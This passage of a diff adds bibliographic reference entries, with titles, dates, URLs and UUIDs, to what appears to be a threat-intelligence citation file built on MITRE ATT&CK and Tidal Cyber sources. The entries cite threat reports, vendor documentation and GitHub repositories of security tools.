Play with Itself [PowerPoint slides]. Retrieved November 12, 2014.", + "meta": { + "date_accessed": "2014-11-12T00:00:00Z", + "refs": [ + "https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf" + ], + "source": "MITRE", + "title": "Getting Windows to Play with Itself [PowerPoint slides]" + }, + "related": [], + "uuid": "b212d16f-5347-49ab-8339-432b4fd1ef50", + "value": "Bloxham" + }, + { + "description": "Microsoft. (n.d.). GetWindowLong function. Retrieved December 16, 2017.", + "meta": { + "date_accessed": "2017-12-16T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/library/windows/desktop/ms633584.aspx" + ], + "source": "MITRE", + "title": "GetWindowLong function" + }, + "related": [], + "uuid": "4366217a-2325-4056-ab68-f5f4d2a0703c", + "value": "Microsoft GetWindowLong function" + }, + { + "description": "Microsoft. (2017, May 23). GFlags Overview. Retrieved December 18, 2017.", + "meta": { + "date_accessed": "2017-12-18T00:00:00Z", + "date_published": "2017-05-23T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/windows-hardware/drivers/debugger/gflags-overview" + ], + "source": "MITRE", + "title": "GFlags Overview" + }, + "related": [], + "uuid": "9c11c382-b420-4cf9-9db2-eaa7b60aee2d", + "value": "Microsoft GFlags Mar 2017" + }, + { + "description": "LOLBAS. (2019, December 27). GfxDownloadWrapper.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2019-12-27T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/HonorableMentions/GfxDownloadWrapper/" + ], + "source": "Tidal Cyber", + "title": "GfxDownloadWrapper.exe" + }, + "related": [], + "uuid": "5d97b7d7-428e-4408-a4d3-00f52cf4bf15", + "value": "GfxDownloadWrapper.exe - LOLBAS Project" + }, + { + "description": "Sergiu Gatlan. (2023, April 21). GhostToken GCP flaw let attackers backdoor Google accounts. Retrieved September 18, 2023.", + "meta": { + "date_accessed": "2023-09-18T00:00:00Z", + "date_published": "2023-04-21T00:00:00Z", + "refs": [ + "https://www.bleepingcomputer.com/news/security/ghosttoken-gcp-flaw-let-attackers-backdoor-google-accounts/" + ], + "source": "MITRE", + "title": "GhostToken GCP flaw let attackers backdoor Google accounts" + }, + "related": [], + "uuid": "3f87bd65-4194-5be6-93a1-acde6eaef547", + "value": "GhostToken GCP flaw" + }, + { + "description": "jpillora. (n.d.). GitHub Chisel. Retrieved October 20, 2023.", + "meta": { + "date_accessed": "2023-10-20T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://github.com/jpillora/chisel" + ], + "source": "Tidal Cyber", + "title": "GitHub Chisel" + }, + "related": [], + "uuid": "4a60fb46-06b7-44ea-a9f6-8d6fa81e9363", + "value": "GitHub Chisel" + }, + { + "description": "Gretzky, Kuba. (2019, April 10). Retrieved October 8, 2019.", + "meta": { + "date_accessed": "2019-10-08T00:00:00Z", + "refs": [ + "https://github.com/kgretzky/evilginx2" + ], + "source": "MITRE", + "title": "Github evilginx2" + }, + "related": [], + "uuid": "322e5d90-5095-47ea-b0e2-e7e5fb45fcca", + "value": "Github evilginx2" + }, + { + "description": "kgretzky. (n.d.). GitHub evilginx2. Retrieved December 14, 2023.", + "meta": { + "date_accessed": "2023-12-14T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://github.com/kgretzky/evilginx2" + ], + "source": "Tidal Cyber", + "title": "GitHub evilginx2" + }, + "related": [], + "uuid": "eea178f4-80bd-49d1-84b1-f80671e9a3e4", + "value": "GitHub evilginx2" + }, + { + "description": "Mudge, R. (2014, July 14). Github Malleable-C2-Profiles safebrowsing.profile. Retrieved June 18, 2017.", + "meta": { + "date_accessed": "2017-06-18T00:00:00Z", + "date_published": "2014-07-14T00:00:00Z", + "refs": [ + "https://github.com/rsmudge/Malleable-C2-Profiles/blob/master/normal/safebrowsing.profile" + ], + "source": "MITRE", + "title": "Github Malleable-C2-Profiles safebrowsing.profile" + }, + "related": [], + "uuid": "0a609b90-dbaf-47bc-a642-1d180ca56498", + "value": "GitHub Malleable C2" + }, + { + "description": "GitHub. (n.d.). GitHub - meganz/MEGAsync: Easy automated syncing between your computers and your MEGA Cloud Drive. Retrieved June 22, 2023.", + "meta": { + "date_accessed": "2023-06-22T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://github.com/meganz/MEGAsync" + ], + "source": "Tidal Cyber", + "title": "GitHub - meganz/MEGAsync: Easy automated syncing between your computers and your MEGA Cloud Drive" + }, + "related": [], + "uuid": "6e59c47d-597c-4687-942f-9f1cf1db75d5", + "value": "GitHub meganz MEGAsync" + }, + { + "description": "Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js. Retrieved January 11, 2021.", + "meta": { + "date_accessed": "2021-01-11T00:00:00Z", + "date_published": "2020-11-11T00:00:00Z", + "refs": [ + "https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js" + ], + "source": "MITRE", + "title": "Github - PersistentJXA/BashProfilePersist.js" + }, + "related": [], + "uuid": "b76d3ed0-e484-4ed1-aa6b-892a6f34e478", + "value": "code_persistence_zsh" + }, + { + "description": "Schroeder, W., Warner, J., Nelson, M. (n.d.). Github PowerShellEmpire. Retrieved April 28, 2016.", + "meta": { + "date_accessed": "2016-04-28T00:00:00Z", + "refs": [ + "https://github.com/PowerShellEmpire/Empire" + ], + "source": "MITRE", + "title": "Github PowerShellEmpire" + }, + "related": [], + "uuid": "017ec673-454c-492a-a65b-10d3a20dfdab", + "value": "Github PowerShell Empire" + }, + { + "description": "Nicolas Verdier. (n.d.). Retrieved January 29, 2018.", + "meta": { + "date_accessed": "2018-01-29T00:00:00Z", + "refs": [ + "https://github.com/n1nj4sec/pupy" + ], + "source": "MITRE", + "title": "GitHub Pupy" + }, + "related": [], + "uuid": "69d5cb59-6545-4405-8ca6-733db99d3ee9", + "value": "GitHub Pupy" + }, + { + "description": "threatexpress. (n.d.). GitHub random_c2_profile. Retrieved September 21, 2023.", + "meta": { + "date_accessed": "2023-09-21T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://github.com/threatexpress/random_c2_profile" + ], + "source": "Tidal Cyber", + "title": "GitHub random_c2_profile" + }, + "related": [], + "uuid": "dcb30328-6aa4-461b-8333-451d6af4b384", + "value": "GitHub random_c2_profile" + }, + { + "description": "llkat. (n.d.). GitHub rsockstun. Retrieved December 14, 2023.", + "meta": { + "date_accessed": "2023-12-14T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://github.com/llkat/rsockstun" + ], + "source": "Tidal Cyber", + "title": "GitHub rsockstun" + }, + "related": [], + "uuid": "1644457f-75d6-4064-a11b-9217249fa5e6", + "value": "GitHub rsockstun" + }, + { + "description": "fortra. (n.d.). GitHub secretsdump. Retrieved November 16, 2023.", + "meta": { + "date_accessed": "2023-11-16T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://github.com/fortra/impacket/blob/master/examples/secretsdump.py" + ], + "source": "Tidal Cyber", + "title": "GitHub secretsdump" + }, + "related": [], + "uuid": "c29a90a7-016f-49b7-a970-334290964f19", + "value": "GitHub secretsdump" + }, + { + "description": "djhohnstein. (n.d.). GitHub SharpChromium. Retrieved December 14, 2023.", + "meta": { + "date_accessed": "2023-12-14T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://github.com/djhohnstein/SharpChromium" + ], + "source": "Tidal Cyber", + "title": "GitHub SharpChromium" + }, + "related": [], + "uuid": "ca1956a5-72f2-43ad-a17f-a52ca97bd84e", + "value": "GitHub SharpChromium" + }, + { + "description": "GhostPack. (n.d.). GitHub SharpRoast. Retrieved September 22, 2023.", + "meta": { + "date_accessed": "2023-09-22T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://github.com/GhostPack/SharpRoast" + ], + "source": "Tidal Cyber", + "title": "GitHub SharpRoast" + }, + "related": [], + "uuid": "43a2e05d-4662-4a5c-9c99-3165f0d71169", + "value": "GitHub SharpRoast" + }, + { + "description": "Salvati, M (2019, August 6). SILENTTRINITY. Retrieved March 23, 2022.", + "meta": { + "date_accessed": "2022-03-23T00:00:00Z", + "refs": [ + "https://github.com/byt3bl33d3r/SILENTTRINITY" + ], + "source": "MITRE", + "title": "GitHub SILENTTRINITY March 2022" + }, + "related": [], + "uuid": "cff66280-c592-4e3c-a56c-32a9620cf95c", + "value": "GitHub SILENTTRINITY March 2022" + }, + { + "description": "xmrig. (n.d.). GitHub xmrig-proxy. Retrieved October 25, 2023.", + "meta": { + "date_accessed": "2023-10-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://github.com/xmrig/xmrig-proxy" + ], + "source": "Tidal Cyber", + "title": "GitHub xmrig-proxy" + }, + "related": [], + "uuid": "bd2a5de0-f55f-4eeb-a11f-8ec1e9f2ae2b", + "value": "GitHub xmrig-proxy" + }, + { + "description": "Michael Henriksen. (2018, June 9). Gitrob: Putting the Open Source in OSINT. Retrieved October 19, 2020.", + "meta": { + "date_accessed": "2020-10-19T00:00:00Z", + "date_published": "2018-06-09T00:00:00Z", + "refs": [ + "https://github.com/michenriksen/gitrob" + ], + "source": "MITRE", + "title": "Gitrob: Putting the Open Source in OSINT" + }, + "related": [], + "uuid": "1dee0842-15cc-4835-b8a8-938e0c94807b", + "value": "GitHub Gitrob" + }, + { + "description": "Hirani, M., Jones, S., Read, B. (2019, January 10). Global DNS Hijacking Campaign: DNS Record Manipulation at Scale. Retrieved October 9, 2020.", + "meta": { + "date_accessed": "2020-10-09T00:00:00Z", + "date_published": "2019-01-10T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html" + ], + "source": "MITRE", + "title": "Global DNS Hijacking Campaign: DNS Record Manipulation at Scale" + }, + "related": [], + "uuid": "2c696e90-11eb-4196-9946-b5c4c11ccddc", + "value": "FireEye DNS Hijack 2019" + }, + { + "description": "McAfee® Foundstone® Professional Services and McAfee Labs™. (2011, February 10). Global Energy Cyberattacks: “Night Dragon”. Retrieved February 19, 2018.", + "meta": { + "date_accessed": "2018-02-19T00:00:00Z", + "date_published": "2011-02-10T00:00:00Z", + "refs": [ + "https://scadahacker.com/library/Documents/Cyber_Events/McAfee%20-%20Night%20Dragon%20-%20Global%20Energy%20Cyberattacks.pdf" + ], + "source": "MITRE", + "title": "Global Energy Cyberattacks: “Night Dragon”" + }, + "related": [], + "uuid": "242d2933-ca2b-4511-803a-454727a3acc5", + "value": "McAfee Night Dragon" + }, + { + "description": "GMER. (n.d.). GMER. Retrieved December 12, 2017.", + "meta": { + "date_accessed": "2017-12-12T00:00:00Z", + "refs": [ + "http://www.gmer.net/" + ], + "source": "MITRE", + "title": "GMER" + }, + "related": [], + "uuid": "f43e9881-4919-4ccc-b2ed-929d7838b2b4", + "value": "GMER Rootkits" + }, + { + "description": "Pascal Nowack. (n.d.). Retrieved September 21, 2021.", + "meta": { + "date_accessed": "2021-09-21T00:00:00Z", + "refs": [ + "https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c#L207" + ], + "source": "MITRE", + "title": "Gnome Remote Desktop grd-settings" + }, + "related": [], + "uuid": "8f494ff3-b02b-470b-a57d-d2275989f541", + "value": "Gnome Remote Desktop grd-settings" + }, + { + "description": "Pascal Nowack. (n.d.). Retrieved September 21, 2021.", + "meta": { + "date_accessed": "2021-09-21T00:00:00Z", + "refs": [ + "https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.remote-desktop.gschema.xml.in" + ], + "source": "MITRE", + "title": "Gnome Remote Desktop gschema" + }, + "related": [], + "uuid": "c7c749d5-b1b0-4a0f-8d14-eef47cfa1279", + "value": "Gnome Remote Desktop gschema" + }, + { + "description": "Upham, K. (2014, March). Going Deep into the BIOS with MITRE Firmware Security Research. Retrieved January 5, 2016.", + "meta": { + "date_accessed": "2016-01-05T00:00:00Z", + "date_published": "2014-03-01T00:00:00Z", + "refs": [ + "http://www.mitre.org/publications/project-stories/going-deep-into-the-bios-with-mitre-firmware-security-research" + ], + "source": "MITRE", + "title": "Going Deep into the BIOS with MITRE Firmware Security Research" + }, + "related": [], + "uuid": "25f52172-293e-4b23-9239-201a0ddbcdf1", + "value": "MITRE Trustworthy Firmware Measurement" + }, + { + "description": "Secureworks Counter Threat Unit. (2022, March 1). Gold Blackburn Threat Profile. Retrieved June 15, 2023.", + "meta": { + "date_accessed": "2023-06-15T00:00:00Z", + "date_published": "2022-03-01T00:00:00Z", + "refs": [ + "https://www.secureworks.com/research/threat-profiles/gold-blackburn" + ], + "source": "MITRE", + "title": "Gold Blackburn Threat Profile" + }, + "related": [], + "uuid": "b6b27fa9-488c-5b6d-8e12-fe8371846cd3", + "value": "Secureworks Gold Blackburn Mar 2022" + }, + { + "description": "Secureworks. (n.d.). GOLD CABIN Threat Profile. Retrieved March 17, 2021.", + "meta": { + "date_accessed": "2021-03-17T00:00:00Z", + "refs": [ + "https://www.secureworks.com/research/threat-profiles/gold-cabin" + ], + "source": "MITRE, Tidal Cyber", + "title": "GOLD CABIN Threat Profile" + }, + "related": [], + "uuid": "778babec-e7d3-4341-9e33-aab361f2b98a", + "value": "Secureworks GOLD CABIN" + }, + { + "description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims’ Systems. Retrieved June 6, 2018.", + "meta": { + "date_accessed": "2018-06-06T00:00:00Z", + "date_published": "2018-02-02T00:00:00Z", + "refs": [ + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/" + ], + "source": "MITRE", + "title": "Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims’ Systems" + }, + "related": [], + "uuid": "4bdfa92b-cbbd-43e6-aa3e-422561ff8d7a", + "value": "McAfee Gold Dragon" + }, + { + "description": "Reiner, S. (2017, November 21). Golden SAML: Newly Discovered Attack Technique Forges Authentication to Cloud Apps. Retrieved December 17, 2020.", + "meta": { + "date_accessed": "2020-12-17T00:00:00Z", + "date_published": "2017-11-21T00:00:00Z", + "refs": [ + "https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps" + ], + "source": "MITRE", + "title": "Golden SAML: Newly Discovered Attack Technique Forges Authentication to Cloud Apps" + }, + "related": [], + "uuid": "58083370-8126-47d3-827c-1910ed3f4b2a", + "value": "Cyberark Golden SAML" + }, + { + "description": "Trustwave SpiderLabs. (2020, June 26). GoldenSpy: Chapter Two – The Uninstaller. Retrieved July 23, 2020.", + "meta": { + "date_accessed": "2020-07-23T00:00:00Z", + "date_published": "2020-06-26T00:00:00Z", + "refs": [ + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/goldenspy-chapter-two-the-uninstaller/" + ], + "source": "MITRE", + "title": "GoldenSpy: Chapter Two – The Uninstaller" + }, + "related": [], + "uuid": "5031e82e-66e8-4ae0-be47-53daa87ddf94", + "value": "Trustwave GoldenSpy2 June 2020" + }, + { + "description": "Secureworks. (n.d.). GOLD KINGSWOOD. Retrieved October 18, 2021.", + "meta": { + "date_accessed": "2021-10-18T00:00:00Z", + "refs": [ + "https://www.secureworks.com/research/threat-profiles/gold-kingswood?filter=item-financial-gain" + ], + "source": "MITRE", + "title": "GOLD KINGSWOOD" + }, + "related": [], + "uuid": "36035bbb-1609-4461-be27-ef4a920b814c", + "value": "Secureworks GOLD KINGSWOOD Threat Profile" + }, + { + "description": "Nafisi, R., Lelli, A. (2021, March 4). GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence. Retrieved March 8, 2021.", + "meta": { + "date_accessed": "2021-03-08T00:00:00Z", + "date_published": "2021-03-04T00:00:00Z", + "refs": [ + "https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/" + ], + "source": "MITRE", + "title": "GoldMax, GoldFinder, and Sibot: Analyzing NOBELIUM’s layered persistence" + }, + "related": [], + "uuid": "8688a0a9-d644-4b96-81bb-031f1f898652", + "value": "MSTIC NOBELIUM Mar 2021" + }, + { + "description": "CTU. (n.d.). GOLD NIAGARA. Retrieved September 21, 2021.", + "meta": { + "date_accessed": "2021-09-21T00:00:00Z", + "refs": [ + "https://www.secureworks.com/research/threat-profiles/gold-niagara" + ], + "source": "MITRE", + "title": "GOLD NIAGARA" + }, + "related": [], + "uuid": "b11276cb-f6dd-4e91-90cd-9c287fb3e6b1", + "value": "Secureworks GOLD NIAGARA Threat Profile" + }, + { + "description": "Secureworks. (n.d.). GOLD SOUTHFIELD. Retrieved October 6, 2020.", + "meta": { + "date_accessed": "2020-10-06T00:00:00Z", + "refs": [ + "https://www.secureworks.com/research/threat-profiles/gold-southfield" + ], + "source": "MITRE", + "title": "GOLD SOUTHFIELD" + }, + "related": [], + "uuid": "01d1ffaa-16b3-41c4-bb5a-afe2b41f1142", + "value": "Secureworks GOLD SOUTHFIELD" + }, + { + "description": "Google. (n.d.). Retrieved March 16, 2021.", + "meta": { + "date_accessed": "2021-03-16T00:00:00Z", + "refs": [ + "https://cloud.google.com/identity/docs/reference/rest" + ], + "source": "MITRE", + "title": "Google Cloud Identity API Documentation" + }, + "related": [], + "uuid": "67f2719e-74fd-4bc1-9eeb-07d3095a5191", + "value": "Google Cloud Identity API Documentation" + }, + { + "description": "Spencer Gietzen. (2019, February 26). Google Cloud Platform (GCP) Bucket Enumeration and Privilege Escalation. Retrieved March 4, 2022.", + "meta": { + "date_accessed": "2022-03-04T00:00:00Z", + "date_published": "2019-02-26T00:00:00Z", + "refs": [ + "https://rhinosecuritylabs.com/gcp/google-cloud-platform-gcp-bucket-enumeration/" + ], + "source": "MITRE", + "title": "Google Cloud Platform (GCP) Bucket Enumeration and Privilege Escalation" + }, + "related": [], + "uuid": "d956e1f6-37ca-4352-b275-84c174888b88", + "value": "GCPBucketBrute" + }, + { + "description": "Offensive Security. (n.d.). Google Hacking Database. Retrieved October 23, 2020.", + "meta": { + "date_accessed": "2020-10-23T00:00:00Z", + "refs": [ + "https://www.exploit-db.com/google-hacking-database" + ], + "source": "MITRE", + "title": "Google Hacking Database" + }, + "related": [], + "uuid": "29714b88-a1ff-4684-a3b0-35c3a2c78947", + "value": "ExploitDB GoogleHacking" + }, + { + "description": "Google. (n.d.). Retrieved March 16, 2021.", + "meta": { + "date_accessed": "2021-03-16T00:00:00Z", + "refs": [ + "https://support.google.com/a/answer/166870?hl=en" + ], + "source": "MITRE", + "title": "Google Workspace Global Access List" + }, + "related": [], + "uuid": "5104f0ea-1fb6-4260-a9b6-95922b3a8e5b", + "value": "Google Workspace Global Access List" + }, + { + "description": "Szappanos, G. & Brandt, A. (2021, March 1). “Gootloader” expands its payload delivery options. Retrieved September 30, 2022.", + "meta": { + "date_accessed": "2022-09-30T00:00:00Z", + "date_published": "2021-03-01T00:00:00Z", + "refs": [ + "https://news.sophos.com/en-us/2021/03/01/gootloader-expands-its-payload-delivery-options/" + ], + "source": "MITRE", + "title": "“Gootloader” expands its payload delivery options" + }, + "related": [], + "uuid": "63357292-0f08-4405-a45a-34b606ab7110", + "value": "Sophos Gootloader" + }, + { + "description": "McCabe, A. (2020, January 23). The Fractured Statue Campaign: U.S. Government Agency Targeted in Spear-Phishing Attacks. Retrieved June 2, 2020.", + "meta": { + "date_accessed": "2020-06-02T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/" + ], + "source": "MITRE", + "title": "Government Agency Targeted in Spear-Phishing Attacks" + }, + "related": [], + "uuid": "b65442ca-18ca-42e0-8be0-7c2b66c26d02", + "value": "Unit 42 CARROTBAT January 2020" + }, + { + "description": "Counter Threat Unit Research Team. (2023, May 24). Chinese Cyberespionage Group BRONZE SILHOUETTE Targets U.S. Government and Defense Organizations. Retrieved July 27, 2023.", + "meta": { + "date_accessed": "2023-07-27T00:00:00Z", + "refs": [ + "https://www.secureworks.com/blog/chinese-cyberespionage-group-bronze-silhouette-targets-us-government-and-defense-organizations" + ], + "source": "MITRE", + "title": "Government and Defense Organizations" + }, + "related": [], + "uuid": "77624549-e170-5894-9219-a15b4aa31726", + "value": "Secureworks BRONZE SILHOUETTE May 2023" + }, + { + "description": "Patil, S. and Williams, M.. (2019, June 5). Government Sector in Central Asia Targeted With New HAWKBALL Backdoor Delivered via Microsoft Office Vulnerabilities. Retrieved June 20, 2019.", + "meta": { + "date_accessed": "2019-06-20T00:00:00Z", + "date_published": "2019-06-05T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2019/06/government-in-central-asia-targeted-with-hawkball-backdoor.html" + ], + "source": "MITRE", + "title": "Government Sector in Central Asia Targeted With New HAWKBALL Backdoor Delivered via Microsoft Office Vulnerabilities" + }, + "related": [], + "uuid": "c88150b1-8c0a-4fc5-b5b7-11e242af1c43", + "value": "FireEye HAWKBALL Jun 2019" + }, + { + "description": "CISA. (2020, December 1). Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets. Retrieved December 9, 2021.", + "meta": { + "date_accessed": "2021-12-09T00:00:00Z", + "refs": [ + "https://www.cisa.gov/uscert/ncas/alerts/aa20-296a#revisions" + ], + "source": "MITRE, Tidal Cyber", + "title": "Government Targets" + }, + "related": [], + "uuid": "c7bc4b25-2043-4f43-8320-590f82d0e09a", + "value": "CISA AA20-296A Berserk Bear December 2020" + }, + { + "description": "Campbell, C. (2012, May 24). GPP Password Retrieval with PowerShell. Retrieved April 11, 2018.", + "meta": { + "date_accessed": "2018-04-11T00:00:00Z", + "date_published": "2012-05-24T00:00:00Z", + "refs": [ + "https://obscuresecurity.blogspot.co.uk/2012/05/gpp-password-retrieval-with-powershell.html" + ], + "source": "MITRE", + "title": "GPP Password Retrieval with PowerShell" + }, + "related": [], + "uuid": "54351cf9-8d2a-47fb-92d5-fe64b628ab06", + "value": "Obscuresecurity Get-GPPPassword" + }, + { + "description": "Microsoft. (2017, October 16). gpresult. Retrieved August 6, 2021.", + "meta": { + "date_accessed": "2021-08-06T00:00:00Z", + "date_published": "2017-10-16T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult" + ], + "source": "MITRE", + "title": "gpresult" + }, + "related": [], + "uuid": "88af38e8-e437-4153-80af-a1be8c6a8629", + "value": "Microsoft gpresult" + }, + { + "description": "LOLBAS. (2018, May 25). Gpscript.exe. Retrieved December 4, 2023.", + "meta": { + "date_accessed": "2023-12-04T00:00:00Z", + "date_published": "2018-05-25T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Gpscript/" + ], + "source": "Tidal Cyber", + "title": "Gpscript.exe" + }, + "related": [], + "uuid": "619f57d9-d93b-4e9b-aae0-6ce89d91deb6", + "value": "Gpscript.exe - LOLBAS Project" + }, + { + "description": "ESET. (2020, April 28). Grandoreiro: How engorged can an EXE get?. Retrieved November 13, 2020.", + "meta": { + "date_accessed": "2020-11-13T00:00:00Z", + "date_published": "2020-04-28T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/2020/04/28/grandoreiro-how-engorged-can-exe-get/" + ], + "source": "MITRE", + "title": "Grandoreiro: How engorged can an EXE get?" + }, + "related": [], + "uuid": "d6270492-986b-4fb6-bdbc-2e364947847c", + "value": "ESET Grandoreiro April 2020" + }, + { + "description": "Abramov, D. (2020, April 13). Grandoreiro Malware Now Targeting Banks in Spain. Retrieved November 12, 2020.", + "meta": { + "date_accessed": "2020-11-12T00:00:00Z", + "date_published": "2020-04-13T00:00:00Z", + "refs": [ + "https://securityintelligence.com/posts/grandoreiro-malware-now-targeting-banks-in-spain/" + ], + "source": "MITRE", + "title": "Grandoreiro Malware Now Targeting Banks in Spain" + }, + "related": [], + "uuid": "a2d4bca5-d57d-4a77-95c6-409f90115e2f", + "value": "IBM Grandoreiro April 2020" + }, + { + "description": "AWS. (n.d.). Granting a user permissions to pass a role to an AWS service. Retrieved July 10, 2023.", + "meta": { + "date_accessed": "2023-07-10T00:00:00Z", + "refs": [ + "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_use_passrole.html" + ], + "source": "MITRE", + "title": "Granting a user permissions to pass a role to an AWS service" + }, + "related": [], + "uuid": "01e0c198-dd59-5dd1-b632-73cb316eafe0", + "value": "AWS PassRole" + }, + { + "description": "Microsoft. (n.d.). Graphics.CopyFromScreen Method. Retrieved March 24, 2020.", + "meta": { + "date_accessed": "2020-03-24T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen?view=netframework-4.8" + ], + "source": "MITRE", + "title": "Graphics.CopyFromScreen Method" + }, + "related": [], + "uuid": "b9733af4-ffb4-416e-884e-d51649aecbce", + "value": "CopyFromScreen .NET" + }, + { + "description": "Mercer, W., Rascagneres, P. (2018, April 26). GravityRAT - The Two-Year Evolution Of An APT Targeting India. Retrieved May 16, 2018.", + "meta": { + "date_accessed": "2018-05-16T00:00:00Z", + "date_published": "2018-04-26T00:00:00Z", + "refs": [ + "https://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html" + ], + "source": "MITRE", + "title": "GravityRAT - The Two-Year Evolution Of An APT Targeting India" + }, + "related": [], + "uuid": "2d7a1d72-cc9a-4b0b-a89a-e24ca836879b", + "value": "Talos GravityRAT" + }, + { + "description": "Dunwoody, M. (2016, February 11). Greater Visibility Through PowerShell Logging. Retrieved September 28, 2021.", + "meta": { + "date_accessed": "2021-09-28T00:00:00Z", + "date_published": "2016-02-11T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html" + ], + "source": "MITRE", + "title": "Greater Visibility Through PowerShell Logging" + }, + "related": [], + "uuid": "02ee8297-60e8-42bf-8791-2461ebc29207", + "value": "FireEye PowerShell Logging" + }, + { + "description": "Dunwoody, M. (2016, February 11). GREATER VISIBILITY THROUGH POWERSHELL LOGGING. Retrieved February 16, 2016.", + "meta": { + "date_accessed": "2016-02-16T00:00:00Z", + "date_published": "2016-02-11T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html" + ], + "source": "MITRE", + "title": "GREATER VISIBILITY THROUGH POWERSHELL LOGGING" + }, + "related": [], + "uuid": "eb1e9dc7-b935-42ae-bbde-d2fdda5953db", + "value": "FireEye PowerShell Logging 2016" + }, + { + "description": "Sandvik, Runa. (2021, October 18). Green Lambert and ATT&CK. Retrieved March 21, 2022.", + "meta": { + "date_accessed": "2022-03-21T00:00:00Z", + "date_published": "2021-10-18T00:00:00Z", + "refs": [ + "https://www.glitch-cat.com/blog/green-lambert-and-attack" + ], + "source": "MITRE", + "title": "Green Lambert and ATT&CK" + }, + "related": [], + "uuid": "f22d033c-4474-4bd7-b194-c7a4d9819a2b", + "value": "Glitch-Cat Green Lambert ATTCK Oct 2021" + }, + { + "description": "Cherepanov, A. (2018, October). GREYENERGY A successor to BlackEnergy. Retrieved November 15, 2018.", + "meta": { + "date_accessed": "2018-11-15T00:00:00Z", + "date_published": "2018-10-01T00:00:00Z", + "refs": [ + "https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf" + ], + "source": "MITRE", + "title": "GREYENERGY A successor to BlackEnergy" + }, + "related": [], + "uuid": "f3e70f41-6c22-465c-b872-a7ec5e6a3e67", + "value": "ESET GreyEnergy Oct 2018" + }, + { + "description": "Department of Homeland Security and Federal Bureau of Investigation. (2016, December 29). GRIZZLY STEPPE – Russian Malicious Cyber Activity. Retrieved January 11, 2017.", + "meta": { + "date_accessed": "2017-01-11T00:00:00Z", + "date_published": "2016-12-29T00:00:00Z", + "refs": [ + "https://www.us-cert.gov/sites/default/files/publications/JAR_16-20296A_GRIZZLY%20STEPPE-2016-1229.pdf" + ], + "source": "MITRE", + "title": "GRIZZLY STEPPE – Russian Malicious Cyber Activity" + }, + "related": [], + "uuid": "4b26d274-497f-49bc-a2a5-b93856a49893", + "value": "GRIZZLY STEPPE JAR" + }, + { + "description": "Scott-Railton, J., et al. (2016, August 2). Group5: Syria and the Iranian Connection. Retrieved September 26, 2016.", + "meta": { + "date_accessed": "2016-09-26T00:00:00Z", + "date_published": "2016-08-02T00:00:00Z", + "refs": [ + "https://citizenlab.ca/2016/08/group5-syria/" + ], + "source": "MITRE, Tidal Cyber", + "title": "Group5: Syria and the Iranian Connection" + }, + "related": [], + "uuid": "ffbec5e8-947a-4363-b7e1-812dfd79935a", + "value": "Citizen Lab Group5" + }, + { + "description": "GroupIB_TI. (2023, October 9). Group-IB Threat Intelligence Tweet October 9 2023. Retrieved October 10, 2023.", + "meta": { + "date_accessed": "2023-10-10T00:00:00Z", + "date_published": "2023-10-09T00:00:00Z", + "owner": "TidalCyberIan", + "refs": [ + "https://twitter.com/GroupIB_TI/status/1711234869060358562" + ], + "source": "Tidal Cyber", + "title": "Group-IB Threat Intelligence Tweet October 9 2023" + }, + "related": [], + "uuid": "2df546ed-6577-44b2-9b26-0a17c3622df7", + "value": "Group-IB Threat Intelligence Tweet October 9 2023" + }, + { + "description": "srachui. (2012, February 13). Group Policy Basics – Part 1: Understanding the Structure of a Group Policy Object. Retrieved March 5, 2019.", + "meta": { + "date_accessed": "2019-03-05T00:00:00Z", + "date_published": "2012-02-13T00:00:00Z", + "refs": [ + 